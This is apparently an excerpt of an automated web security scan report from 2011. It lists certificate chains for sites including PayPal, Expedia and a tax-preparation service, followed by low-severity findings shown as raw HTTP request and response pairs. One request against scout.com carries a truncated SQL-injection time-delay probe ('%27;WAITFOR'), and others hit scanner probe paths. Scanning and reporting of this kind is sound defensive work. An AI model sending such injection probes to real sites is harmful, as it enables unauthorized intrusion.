Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
Issued to: | secure.trust-guard.com |
Issued by: | Equifax Secure Global eBusiness CA-1 |
Valid from: | Thu Oct 23 09:21:27 CDT 2008 |
Valid to: | Tue Oct 23 09:21:27 CDT 2012 |
Issued to: | Equifax Secure Global eBusiness CA-1 |
Issued by: | Equifax Secure Global eBusiness CA-1 |
Valid from: | Sun Jun 20 23:00:00 CDT 1999 |
Valid to: | Sat Jun 20 23:00:00 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://ssl.google |
Path: | / |
Issued to: | *.google-analytics.com |
Issued by: | Google Internet Authority |
Valid from: | Wed Apr 13 04:15:13 CDT 2011 |
Valid to: | Fri Apr 13 04:25:13 CDT 2012 |
Issued to: | Google Internet Authority |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Mon Jun 08 15:43:27 CDT 2009 |
Valid to: | Fri Jun 07 14:43:27 CDT 2013 |
Issued to: | Equifax Secure Certificate Authority |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://subscribe |
Path: | / |
Issued to: | subscribe.haymarketmedia.com |
Issued by: | Trusted Secure Certificate Authority |
Valid from: | Mon Jun 21 19:00:00 CDT 2010 |
Valid to: | Thu Jun 21 18:59:59 CDT 2012 |
Issued to: | Trusted Secure Certificate Authority |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Thu Jun 28 13:14:35 CDT 2007 |
Valid to: | Sun Oct 28 13:44:35 CDT 2012 |
Issued to: | Entrust.net Secure Server Certification Authority |
Issued by: | Entrust.net Secure Server Certification Authority |
Valid from: | Tue May 25 11:09:40 CDT 1999 |
Valid to: | Sat May 25 11:39:40 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://support.trust |
Path: | / |
Issued to: | support.trust-guard.com |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Tue Feb 02 05:30:20 CST 2010 |
Valid to: | Mon Feb 02 18:24:48 CST 2015 |
Issued to: | Equifax Secure Certificate Authority |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://verify.authorize |
Path: | / |
Issued to: | *.authorize.net |
Issued by: | Entrust Certification Authority - L1C |
Valid from: | Wed Mar 31 12:04:00 CDT 2010 |
Valid to: | Fri Mar 30 12:33:57 CDT 2012 |
Issued to: | Entrust Certification Authority - L1C |
Issued by: | Entrust.net Certification Authority (2048) |
Valid from: | Thu Dec 10 14:43:54 CST 2009 |
Valid to: | Tue Dec 10 15:13:54 CST 2019 |
Issued to: | Entrust.net Certification Authority (2048) |
Issued by: | Entrust.net Certification Authority (2048) |
Valid from: | Fri Dec 24 11:50:51 CST 1999 |
Valid to: | Tue Jul 24 09:15:12 CDT 2029 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.expedia.com |
Path: | / |
Issued to: | www.expedia.com,ST=WASHINGTON |
Issued by: | Akamai Subordinate CA 3 |
Valid from: | Sun Apr 10 17:54:27 CDT 2011 |
Valid to: | Tue Apr 10 17:54:27 CDT 2012 |
Issued to: | Akamai Subordinate CA 3 |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Thu May 11 10:32:00 CDT 2006 |
Valid to: | Sat May 11 18:59:00 CDT 2013 |
Issued to: | GTE CyberTrust Global Root |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Wed Aug 12 19:29:00 CDT 1998 |
Valid to: | Mon Aug 13 18:59:00 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fiddler2.com |
Path: | / |
Issued to: | www.fiddler2.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Thu Oct 02 14:41:36 CDT 2008 |
Valid to: | Sun Oct 02 14:41:36 CDT 2011 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Thu Jun 29 12:06:20 CDT 2034 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.gofileroom |
Path: | / |
Issued to: | www.gofileroom.com |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Sun May 23 22:49:01 CDT 2010 |
Valid to: | Sat Aug 25 10:25:42 CDT 2012 |
Issued to: | Equifax Secure Certificate Authority |
Issued by: | Equifax Secure Certificate Authority |
Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.google.com |
Path: | / |
Issued to: | www.google.com |
Issued by: | Thawte SGC CA |
Valid from: | Thu Dec 17 18:00:00 CST 2009 |
Valid to: | Sun Dec 18 17:59:59 CST 2011 |
Issued to: | Thawte SGC CA |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Wed May 12 19:00:00 CDT 2004 |
Valid to: | Mon May 12 18:59:59 CDT 2014 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 CST 1996 |
Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mavituna |
Path: | / |
Issued to: | www.mavitunasecurity.com |
Issued by: | Starfield Secure Certification Authority |
Valid from: | Sat Aug 21 10:02:55 CDT 2010 |
Valid to: | Sun Aug 26 05:09:38 CDT 2012 |
Issued to: | Starfield Secure Certification Authority |
Issued by: | Starfield Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:15:40 CST 2006 |
Valid to: | Sun Nov 15 19:15:40 CST 2026 |
Issued to: | Starfield Class 2 Certification Authority |
Issued by: | Starfield Class 2 Certification Authority |
Valid from: | Tue Jun 29 12:39:16 CDT 2004 |
Valid to: | Thu Jun 29 12:39:16 CDT 2034 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.paypal.com |
Path: | / |
Issued to: | www.paypal.com |
Issued by: | VeriSign Class 3 Extended Validation SSL CA |
Valid from: | Tue Mar 22 19:00:00 CDT 2011 |
Valid to: | Mon Apr 01 18:59:59 CDT 2013 |
Issued to: | VeriSign Class 3 Extended Validation SSL CA |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Mon Nov 07 17:59:59 CST 2016 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Sun Nov 07 17:59:59 CST 2021 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 CST 1996 |
Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.taxnotebook |
Path: | / |
Issued to: | www.taxnotebook.com |
Issued by: | Entrust Certification Authority - L1B |
Valid from: | Thu Sep 24 16:53:55 CDT 2009 |
Valid to: | Fri Sep 30 17:23:38 CDT 2011 |
Issued to: | Entrust Certification Authority - L1B |
Issued by: | Entrust.net Certification Authority (2048) |
Valid from: | Mon Aug 25 13:14:26 CDT 2008 |
Valid to: | Sat Aug 25 13:44:26 CDT 2018 |
Issued to: | Entrust.net Certification Authority (2048) |
Issued by: | Entrust.net Certification Authority (2048) |
Valid from: | Fri Dec 24 11:50:51 CST 1999 |
Valid to: | Tue Jul 24 09:15:12 CDT 2029 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.trpc401k.com |
Path: | / |
Issued to: | www.trpc401k.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Sat Feb 12 09:53:25 CST 2011 |
Valid to: | Wed Feb 12 09:53:25 CST 2014 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.trust-guard |
Path: | / |
Issued to: | www.trust-guard.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Wed Apr 21 09:33:31 CDT 2010 |
Valid to: | Sun Apr 21 09:33:31 CDT 2013 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Severity: | Low |
Confidence: | Certain |
Host: | http://nba.scout.com |
Path: | / |
GET / HTTP/1.1 Host: nba.scout.com Proxy-Connection: keep-alive Referer: http://www.scout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:30:41 GMT Content-Type: text/html Content-Location: http://nba.scout.com Last-Modified: Fri, 06 May 2011 17:43:32 GMT Accept-Ranges: bytes ETag: "ec70541e15ccc1:68c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Server: Pike Vary: Accept-Encoding Content-Length: 25838 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>NBA Team Directory Front Page</title> <meta http-equiv="Con ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://recruiting.scout |
Path: | /Legacy/a.z |
GET /Legacy/a.z?s=143&p=26 Host: recruiting.scout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 21:42:14 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 21:52:13 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 12091 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://subscribe |
Path: | /scm/ |
GET /scm/?form= HTTP/1.1 Host: subscribe.haymarketmedia Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:49:16 GMT Content-Length: 5394 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><link href="Pubs/SC ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTAzNTk4OTM0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://subscribe |
Path: | /subscribe/CCI_Custserve |
GET /subscribe/CCI_Custserve Host: subscribe.haymarketmedia Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:49:27 GMT Content-Length: 8523 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> Haymarket ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMzMxNjMx ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | / |
GET / HTTP/1.1 Host: www.scout.com Proxy-Connection: keep-alive Referer: http://www.scout.com/2/a User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 19:30:31 GMT Content-Type: text/html Expires: Fri, 06 May 2011 19:40:31 GMT Last-Modified: Fri, 06 May 2011 17:41:15 GMT Accept-Ranges: bytes ETag: "1CC0C14CC196F80" Server: Microsoft-IIS/6.0 Server: Static2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 98822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Scout.com - College and High School Football, Basketball, Recruiti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /2/Netsparker14ebae4 |
GET /2/Netsparker14ebae4 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate |
HTTP/1.1 404 Not Found Connection: close Date: Fri, 06 May 2011 19:56:50 GMT Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: private Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /2/a.z |
GET /2/a.z?cfg=%27;WAITFOR Host: www.scout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 19:29:27 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 19:39:01 GMT Server: Microsoft-IIS/6.0 Server: Sodo X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Vary: Accept-Encoding Content-Length: 11983 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /Legacy/a.z |
GET /Legacy/a.z HTTP/1.1 Host: www.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BrandId=0; RefId=0; __utmz=202704078 |
HTTP/1.1 404 Not Found Connection: close Date: Fri, 06 May 2011 20:44:56 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: public, s-maxage=600 Expires: Fri, 06 May 2011 20:54:56 GMT Content-Type: text/html Content-Length: 12238 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /Netsparker892e40908 |
GET /Netsparker892e40908 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate |
HTTP/1.1 404 Not Found Connection: close Date: Fri, 06 May 2011 19:57:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Server: Pike X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: private Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /PictureGallery.aspx |
GET /PictureGallery.aspx HTTP/1.1 Host: www.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BrandId=0; RefId=0; __utmz=202704078 |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 20:44:55 GMT Server: Microsoft-IIS/6.0 Server: Market X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 2493 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head> <title> Scout.com: Photo Gallery</title> <style type="text/css">BODY { FONT-FAMILY: verdana, arial } ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTUxNTAyNjY5 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /a.z |
POST /a.z?s=143&p=9&c=2&cid Referer: http://www.scout.com/a.z User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate Content-Length: 61 __VIEWSTATE=%2fwEPDwULLTEzNzQyNz |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 19:57:50 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:07:49 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 27005 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Scout.com: Zack Williams Profile</title> <meta http ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /search.aspx |
GET /search.aspx HTTP/1.1 Host: www.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BrandId=0; RefId=0; __utmz=202704078 |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 20:44:57 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 14458 <!-- Start frame cache output for cachekey = (s=143&p=9&c=999.header) --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <ht ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.taxnotebook |
Path: | /Login/ChangePwd.aspx |
GET /Login/ChangePwd.aspx Host: www.taxnotebook.com Connection: keep-alive Referer: https://www.taxnotebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SessionStateGUID=d3f0c14d |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 10090 <img src='../images/tnlogo.gif <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Online federal and state tax preparation.</title> ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNjU0NDg2 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.taxnotebook |
Path: | /Login/PopupMessage.aspx |
GET /Login/PopupMessage.aspx Host: www.taxnotebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:49:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: SessionStateGUID=6faf2a0c Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 6653 <img src='../images/tnlogo.gif <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Tax Notebook</title> <LINK href="../Main.css" typ ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTU5NjA0OTc5 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.taxnotebook |
Path: | /Login/TNLogin.aspx |
GET /Login/TNLogin.aspx HTTP/1.1 Host: www.taxnotebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: refaccno=759456; ASPSESSIONIDAABTDSBD |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: SessionStateGUID=819ade93 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 10347 <img src='../images/tnlogo.gif <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Tax Notebook</title> <link href="../Main.css" typ ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjA2NzY3ODc1 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://a.triggit.com |
Path: | /pxbk |
GET /pxbk?bk_uuid=dwzgv1 Host: a.triggit.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: trgu=c1e1301e-3a1f-4ca7 |
HTTP/1.1 302 Found Location: http://af5e0e95996f8cc96 Date: Fri, 06 May 2011 22:34:57 GMT Content-Length: 11 Content-Type: text/html; charset=ISO-8859-1 Redirecting |
Severity: | Low |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
GET /r?c2=6035740&d.c=http%3a//ae1138bbd27 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ae1138bbd2776f84f Date: Fri, 06 May 2011 18:39:34 GMT Connection: close Set-Cookie: UID=25894b9d-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Low |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /activity |
GET /activity?_o=62795&_t=cm Host: d.xp1.ru4.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AM-00000000030620452 |
